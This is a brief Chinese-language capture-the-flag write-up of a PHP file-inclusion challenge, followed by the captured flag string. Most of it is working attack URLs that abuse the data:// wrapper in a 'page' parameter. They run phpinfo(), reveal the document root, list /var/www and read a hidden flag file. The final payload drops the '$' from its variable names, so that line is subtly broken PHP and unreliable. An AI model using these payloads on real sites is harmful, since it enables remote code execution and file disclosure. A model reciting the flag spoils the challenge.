1.题目链接
2.补充知识:
3.构造:执行成功
/?page=data://text/plain,<?php phpinfo()?>
4.构造下面url,得到目录路径
/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>
5构造下面url,读取该路径的文件
?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>
6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。
/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}